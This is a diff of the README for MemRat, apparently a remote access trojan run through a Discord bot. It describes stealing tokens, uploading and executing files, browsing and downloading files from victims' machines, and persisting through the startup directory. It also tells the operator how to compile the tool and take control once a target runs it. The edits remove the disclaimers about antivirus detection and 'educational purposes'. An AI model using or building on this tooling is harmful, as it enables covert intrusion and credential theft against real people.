NotaKennen/MemRat-v1/README.md

 # MemRat
-MemRat a.k.a MemWare is a quite simple rat designed to be used through a Discord Bot.
+MemRat is a quite simple rat designed to be used through a Discord Bot.

 The main functions include:
- - Uploading (and executing) files on the victim's machine
+ - Uploading (and executing) files on the target's machine
- - Stealing tokens on request
+ - Taking the target's tokens
- - Annoying the victim
+ - Annoying the target
  - Being remote controlled
  - Controllable file explorer on victim's machine
  - Downloading files from the victim's machine (handy with the file explorer)
- - Working for multiple machines, and being able to give machines nicknames to recognize them.
+ - Working for multiple machines at once, and being able to give machines nicknames to recognize them.
  - Streaming service on a simple Flask website (a bit broken currently)

-The rat IS DETECTABLE by default, you have to obfuscate it yourself if you feel like getting it through AV.
-This rat is for educational purposes only.

 ## RAT USE AND COMPILING
- - The rat is quite simple to use: Set configs to be the ones you want (startup, bot token, notificationchannel), compile it with a python compiler (such as PyInstaller, not included), done.
-When someone launches the EXE, you will get a notification in the notification channel you set, and you can start controlling the machine with '(MACHINE'S-IP)+help' on any channel that the discord bot is in.
-The machine's IP will be included in the start notification.

-WIP IDEAS:
- - Keylogger
- - Probably import this to work on the web instead of discord some day
- - Spreader / Worm
- - Discord self-botter
- - Audiolog and Audio streamed in VC

-The token logger in the rat is taken from: https://github.com/mouadessalim/CookedGrabber (Not mine)
+ - To use the rat, you might want to compile your python code first.
+You can do this with whatever compiler you want (such as PyInstaller).
+Then after that, the target has to run the file once, the rat should move into a startup directrory, so it should start up automatically when the computer is started.
+After the target runs the rat for the first time, you will get a notification in the channel you provided, including the machine's IP and the command used to control the machine.